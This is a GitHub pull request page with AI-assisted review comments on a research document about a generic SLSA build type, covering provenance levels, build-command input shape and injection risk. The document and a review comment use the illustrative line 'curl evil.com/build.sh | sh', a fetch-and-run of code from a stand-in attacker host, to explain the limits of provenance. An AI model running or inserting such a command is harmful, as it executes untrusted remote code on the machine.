Phase 1 research: generic build type#179
Conversation
TomHennen
left a comment
There was a problem hiding this comment.
Comment-only review — leaving approve/request-changes to the human owner. (Test post — full review follows in a subsequent comment if this works.)
TomHennen
left a comment
There was a problem hiding this comment.
Test single quotes multi line newline literal in arg
TomHennen
left a comment
There was a problem hiding this comment.
Line one.
Line two.
Line three.
TomHennen
left a comment
There was a problem hiding this comment.
FULL REVIEW. Please disregard the three test posts above, those were a quoting workaround for sandbox restrictions.
TOP LEVEL
The doc is a high-quality Phase 1 artifact. It honestly re-frames a question list designed for ecosystem-shaped types onto a build type that has no ecosystem, surfaces three load-bearing findings (SLSA-level decision, contract inversion at the build.sh boundary, thinner value-add) without prematurely resolving them, and stays disciplined about the scope boundary with issue 171. Writing is clear and cross-references are accurate.
The strongest thing to flag is one slightly handwavy argument (the rejection of wrap-only); the rest is small.
TomHennen
left a comment
There was a problem hiding this comment.
VERIFIED CLAIMS (against primary sources)
-
generator_generic_slsa3.yml does not run the user's build and records subject hashes plus workflow context, not build steps. Confirmed against the generic builder README at https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/generic/README.md — the PR is accurate that the provenance does not record the build command or toolchain versions when this generator is used.
-
SLSA Docker builder runs the user-supplied command inside an isolated reusable workflow with the command recorded as an attested input. Confirmed against the Docker builder README at https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/docker/README.md — command is argv format, captured in buildConfig.Command, and the builder also records the base image digest. The PR's framing is correct.
-
BYOB is the documented framework path for tool maintainers. Confirmed against https://github.com/slsa-framework/slsa-github-generator/blob/main/BYOB.md.
-
Starter workflow has the 'Update the sha256 sum arguments to include all binaries' comment and lacks SBOM/scan. Confirmed.
-
L3 attaches to the signing path, not the build job. Consistent with the SLSA v1.0 levels spec at https://slsa.dev/spec/v1.0/levels — Build L3 is a property of the build platform's signing/isolation infrastructure. Wrangle's existing python type ships at L3 by exactly the construction the PR describes (build runs in normal job; generator_generic_slsa3 provides the L3 envelope). The PR's caveat about a hostile curl-piped-to-sh build command still attaching at L3 is a fair sharpening of the framing.
TomHennen
left a comment
There was a problem hiding this comment.
FINDINGS
- The 'wrap-only adds nothing wrangle-specific' rejection is true but the argument is a bit loose
The doc says: 'Wrapping that flow without invoking the build adds nothing wrangle-specific to the provenance: the provenance's workflow_ref would point at the caller's workflow, the build identity wrangle tags would not appear in the attested inputs, and an adopter could not tell from the provenance that wrangle was involved at all.'
Strictly, even in a wrap-only shape wrangle's reusable workflow could call generator_generic_slsa3.yml itself, in which case workflow_ref WOULD point at wrangle's reusable workflow and an adopter could observe wrangle's involvement from the provenance alone. The actually-load-bearing point — and the right reason — is WHERE BUILD HYGIENE RUNS RELATIVE TO THE ATTESTED WORKFLOW CONTEXT: in the 'wrangle invokes' shape, hashing/SBOM/gating happen inside the workflow whose ref the provenance records and whose source is the calling repo, so the attestation transitively certifies that wrangle's hygiene ran. In a 'wrap-only' shape, wrangle's hygiene runs alongside an externally-built artifact that came from somewhere unattested. Same conclusion the PR reaches; the argument as written underweights the strongest version of itself. Worth a one-line tightening.
Issue 171's maintainer correction ('if wrangle doesn't invoke the build, it can't attest to it') is the right framing; the PR's expansion of it is what got slightly loose.
- The contract inversion finding is rigorous and worth keeping prominent
The doc says: 'the build command itself is an argument to build.sh rather than the body of build.sh. That inverts the existing pattern (python's build.sh contains python -m build; generic's build.sh would invoke whatever the user passed).'
This is the cleanest finding in the doc and exactly the kind of contract-stress 171 needs. The follow-on observation — that if the inversion drags GHA-specific glue (GITHUB_OUTPUT heredoc handling, actions/upload-artifact) into build.sh, the build type that should be the EASIEST to make portable becomes the worst — is sharp. Keep it.
TomHennen
left a comment
There was a problem hiding this comment.
- The value-add section is honestly thin in the right places
The 'What wrangle's generic build type does NOT add' sub-section is candid where Phase 1 docs usually aren't (no ecosystem-native attestation, no toolchain setup, no build-tool detection, no publish step). The 'real but not transformative' framing is accurate given the verified upstream landscape.
One sub-claim worth stress-testing: the value-add list calls out 'permission-cascade handling' as an ergonomics win. That's true today and a real pain point — but if the SLSA-level decision later flips to the Docker builder, the permission cascade is different (Docker builder uses BYOB's SLSA Reusable Workflow, with its own permission shape). The PR doesn't claim otherwise but the value-add list is implicitly anchored on generator_generic_slsa3.yml. Acceptable for Phase 1; worth re-examining if 171 picks the Docker builder.
- Input set is appropriately bounded; the open shape questions are well enumerated
The input table covers path, build-command, artifact-paths, working-directory, test-command, sbom-scope, release-events, env/secrets. The open shape questions per row (glob vs. list vs. directory; argv vs. shell string; multi-line; default working dir = path) are the right contract-stress points. Nothing load-bearing missing — output-directory (mentioned in the security section) is the only minor gap, and it's enumerable as a follow-on of the directory-as-artifact decision rather than a new axis. Affirm rather than ding.
- Security model — right depth for Phase 1
The doc says 'Phase 1 flags the implications without designing the validation' — this is the right line to draw and the PR draws it correctly. The five sub-bullets (env-passthrough, shell-vs-argv, path validation widening, workspace traversal, secret leakage, no-escape-hatch) name the surface; 171 picks the validation. The bash -c BUILD_COMMAND framing follows CLAUDE.md's expression-injection rule, and the call-out that argv-only doesn't actually narrow the surface for bash -c shapes is correct (and a useful counter-intuitive finding).
TomHennen
left a comment
There was a problem hiding this comment.
- Awkward cases are well surveyed
Multi-step builds, build caches outside the workspace (Bazel/Gradle/ccache), multi-arch, network access, reproducibility (correctly out-of-scope), and the empty-output overlap with shell are all flagged. The 'shell handles empty-artifact' boundary is a useful contract-clarifying observation. Two cases I would consider adding:
- Builds that produce a different filename per run (timestamp-stamped, commit-hash-stamped). Globs handle this; exact-list shape doesn't. Worth surfacing as a forcing function for the glob-vs-list decision.
- Builds that invoke a remote-publishing tool as part of the build itself (where artifact identity emerges only after a remote interaction). Out of scope for generic by intent — that's what the per-ecosystem types are for — but worth a sentence noting it's intentionally excluded.
Both are minor; would not block.
- Citations are accurate; one stylistic note
Every cited source I checked (starter-workflows, generic README, Docker builder README, BYOB, python SPEC) is correctly characterized. No fabricated quotes. Two of the GitHub URLs (Docker builder, BYOB) point at main rather than tag-pinned; for a research doc that's fine, but if any of those move you'd want a snapshot.
- Scope discipline
The doc explicitly says 'research only ... no build-type adapter contract is committed' up front and reiterates 'Open question for 171' in seven places. It does not pick a contract shape, a glob policy, an SBOM scope default, or an upstream generator. The line is drawn correctly.
TomHennen
left a comment
There was a problem hiding this comment.
- Cross-cutting findings vs. PR 178 (npm) and PR 180 (Go)
(For the human owner, since you have all three sibling PRs open simultaneously.)
-
All three PRs surface a contract-stress finding for build.sh that the existing python/container types do not stress. Generic inverts (command becomes an arg); Go's builder_go_slsa3.yml owns the build and breaks wrangle's hashes-emit seam; npm has user-defined npm-run-build plus the workspaces-don't-fit-one-path-one-artifact issue. Issue 171's contract design pass should consider all three together — not in isolation — because each surfaces a different axis. Generic alone could mislead the contract toward 'make the inversion the canonical shape'; Go alone could mislead toward 'the SLSA-specific builder owns the build.'
-
All three flag the SLSA-level decision as contract-shaping rather than implementation detail. Generic between generator_generic_slsa3 and Docker builder; Go between Pattern A (builder_go_slsa3), Pattern B (goreleaser + generic generator), and Pattern C (goreleaser + cosign + GH artifact attestations); npm between npm-publish-provenance (already SLSA Sigstore-signed) and the beta SLSA Node.js builder. 171 will need a wrangle-wide POLICY for these picks (e.g. 'prefer the upstream's most-isolated builder unless it breaks wrangle's seam') rather than a per-type pick.
-
All three keep scope discipline. Each names alternatives without picking. Each is roughly proportionate to the question density of its ecosystem (npm 260 lines, generic 216, Go 133). No sprawl.
- Small/quibble
- The doc references the python 'cd into dist/' trick. Verified against build/actions/python/SPEC.md step 5 — accurate.
- The empty-glob policy ('the build silently produced nothing') is correctly identified as ambiguous. Worth noting that the existing tool-adapter contract's exit-2 semantic is the most natural fit (build error, not empty success), but the PR already nods to this.
OVERALL
Solid research doc, ready for human review. The one substantive sharpening I would ask for is the wrap-only-rejection argument; everything else is affirming or minor. The boundary with 171 is drawn well; the contract-shaping decisions are surfaced cleanly without pre-committing.
TomHennen
left a comment
There was a problem hiding this comment.
There's a ton of text here. You're punting on a lot. Can you come up with some proposal that covers this need. Make some choices. Defend them.
|
|
||
| - "SLSA L3" is the right label, by parity with python and with how `generator_generic_slsa3.yml`'s reference example is framed. | ||
| - The provenance does **not** prove anything specific about the user's build command — only that wrangle's workflow ran, that some build happened inside it, and that the resulting hashes match. If the user's command is `curl evil.com/build.sh | sh`, the provenance still attaches at L3, because L3 is a property of the *signing path*, not of the build hygiene. | ||
| - A genuinely stronger story (build runs inside an isolated reusable workflow, build command is recorded as an attested input) exists upstream — `slsa-framework/slsa-github-generator`'s [Docker builder](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/docker/README.md) does exactly this: it runs the user-supplied command inside a pinned builder image, in an isolated reusable workflow, and records the command and image digest as attested provenance fields. The [BYOB framework](https://github.com/slsa-framework/slsa-github-generator/blob/main/BYOB.md) ("Build Your Own Builder") is the documented path for tool maintainers to ship that shape. |
There was a problem hiding this comment.
Hmm, I wonder if wrangle should investigate this (or something like it).
After all, wrangle is doing the builds. Maybe we're already equivalent and do enforce properl build shape (e.g. no curl evil...)
|
|
||
| At minimum the user must declare a command to run. The shape of that declaration is the most contract-stressing input in the build type and the one #171 most needs to consider: | ||
|
|
||
| - **Single command vs. step list.** A one-shot `command` field covers `make all` and `./build.sh`, but realistic builds often want test → build → package as separate steps with separate failure semantics (a test failure must stop, but it's distinct from a build failure for reporting). Adopters can collapse this into a single shell script in their repo and declare *that* as the command, but the contract decision is whether the build type pushes that complexity into the user's repo or absorbs it. (Cf. python, where wrangle has a separate `run-tests` boolean and a separate build step because it knows the canonical tools for each.) **Open question for #171.** |
There was a problem hiding this comment.
we should at least have test separated out. We'll want to ensure tests ran and attest to that at some point.
|
|
||
| - **Single command vs. step list.** A one-shot `command` field covers `make all` and `./build.sh`, but realistic builds often want test → build → package as separate steps with separate failure semantics (a test failure must stop, but it's distinct from a build failure for reporting). Adopters can collapse this into a single shell script in their repo and declare *that* as the command, but the contract decision is whether the build type pushes that complexity into the user's repo or absorbs it. (Cf. python, where wrangle has a separate `run-tests` boolean and a separate build step because it knows the canonical tools for each.) **Open question for #171.** | ||
| - **Working directory.** The runbook's existing types take a `path:` input that resolves the project root. Generic likely needs the same, plus possibly a separate "working directory the command runs from" if these can differ. Container and python collapse them. | ||
| - **Shell vs. argv.** A `command:` string evaluated by `bash -c` admits shell features (pipelines, env-var expansion) but creates an injection surface against the wrangle action itself; an argv list is safer but inconvenient for the common `make && tar -czf out.tgz dist/` case. Both shapes are seen in upstream — the [SLSA Docker builder config](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/docker/README.md) takes a TOML `command = ["cp", "...", "..."]` argv list precisely so the build command becomes a structured attested input rather than a shell-evaluated string. |
There was a problem hiding this comment.
is there a reason we can't just suggest they provide scripts to avoid some of the nonense that could otherwise happen?
| - **Shell vs. argv.** A `command:` string evaluated by `bash -c` admits shell features (pipelines, env-var expansion) but creates an injection surface against the wrangle action itself; an argv list is safer but inconvenient for the common `make && tar -czf out.tgz dist/` case. Both shapes are seen in upstream — the [SLSA Docker builder config](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/docker/README.md) takes a TOML `command = ["cp", "...", "..."]` argv list precisely so the build command becomes a structured attested input rather than a shell-evaluated string. | ||
| - **Environment.** Whether the contract guarantees a clean environment, inherits the runner's environment, or supports an explicit allowlist. Wrangle's *adapter* contract (`docs/SPEC.md` §"Tool Adapter API") strips most env vars and forwards only `WRANGLE_EXTRA_*` — that's a useful precedent but the build adapter contract is a different surface and may need a different policy (the user's build command legitimately needs `PATH`, `HOME`, language toolchains, etc.). | ||
|
|
||
| Wrangle does **not** set up the user's toolchain. The python build type runs `actions/setup-python`; container runs `setup-buildx-action`. Generic, by definition, doesn't know what to set up. The adopter is responsible for adding toolchain-setup steps (e.g., `actions/setup-go`, `actions/setup-java`, container image with a compiler) *before* invoking wrangle's reusable workflow / composite action. This is a real adopter-experience difference from every other wrangle build type and the README will need to make it explicit. |
There was a problem hiding this comment.
Could we though? Could they supply a install-deps.sh script? Would devcontainer be helpful here?
Seems like it would be helpful to give them a straightforward place to do it (and also help with 171 later when we want to support other platforms)
Research-only deliverable per docs/HOW_TO_ADD_A_BUILD_TYPE.md Phase 1, re-interpreted for the user-supplies-command, wrangle-invokes case. No action.yml, no implementation, no #171 contract design. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Restructured per maintainer feedback. Picks the scripts shape (build.sh required; optional test.sh, install-deps.sh, lint.sh in .wrangle/) plus a small structured input set (path, artifact-paths as exact-list, release-events). Sidesteps the shell-vs-argv DSL question by delegating build complexity to user-owned scripts. test.sh runs before build with separate failure semantics; wrangle records that tests ran. install-deps.sh acts as the toolchain seam, which doubles as the per-platform portability lever for #171 later. Reframes the L3 envelope claim: wrangle is the workflow in workflow_ref, so wrangle's enforced shape (script-must-exist, no curl-to-shell) is transitively certified by the L3 envelope. Adds Linting section. generator_generic_slsa3.yml is the v0.1 pick; Docker builder + BYOB mentioned as upgrade path. Contract-stress findings catalogued separately on #171. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…mpete with Replaces the "one attestation per artifact, not stacked" framing per maintainer feedback on #178. Wrangle generates and stores its own L3 SLSA provenance via the upstream generator. For generic specifically there is no ecosystem-native attestation slot to compete with — wrangle's L3 is the attestation, by construction. The "Why this composes meaningfully for generic" follow-up paragraph still holds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
10bc203 to
596d3f9
Compare
Summary
Phase 1 ecosystem research for a
genericbuild type — the case where the user supplies a build command and wrangle invokes it (so provenance can cover the build process). Captured perdocs/HOW_TO_ADD_A_BUILD_TYPE.mdPhase 1, re-interpreted because there is no ecosystem to lean on. Research only — noaction.yml, no implementation, no commitment to a build-type adapter contract shape.Refs #171 (CI portability discussion) and #99 (per-type research umbrella).
Phase 1 questions answered (re-interpreted for generic)
generator_generic_slsa3.yml), not to the build job; the SLSA Docker builder + BYOB are the genuinely-stronger upstream alternatives, and choosing between them is contract-shaping (Track: making wrangle architecture portable to non-GitHub CI/CD systems #171)syftagainst workspace vs. artifact vs. both)Most load-bearing findings for #171
artifact-pathsin particular — glob vs. exact list vs. directory-as-artifact — drives how the SLSA hashing step looks and howslsa-verifier verify-artifactconsumers invoke verification. This is the contract decision generic forces that python and container did not.release-eventsgating, permission-cascade handling), correctness wins (artifact enumeration, hash format), and free SBOM/scan. That's real but not transformative. The honest path to a stronger value prop is the SLSA Docker builder / BYOB shape — at the cost of diverging from how python/container ship today.build.shboundary in Track: making wrangle architecture portable to non-GitHub CI/CD systems #171's contract sketch inverts for generic — build commands are arguments tobuild.shrather than the body ofbuild.sh. If that inversion ends up needing GHA-specific glue ($GITHUB_OUTPUTheredoc handling, etc.), the contract leaks GHA assumptions for the build type that should be the easiest to make portable.Open questions left in the doc (intentionally — these are #171's job)
generator_generic_slsa3.ymlvs. Docker builder / BYOB)Test plan
generator_generic_slsa3.ymlbehavior, BYOB framework, Docker builder.🤖 Generated with Claude Code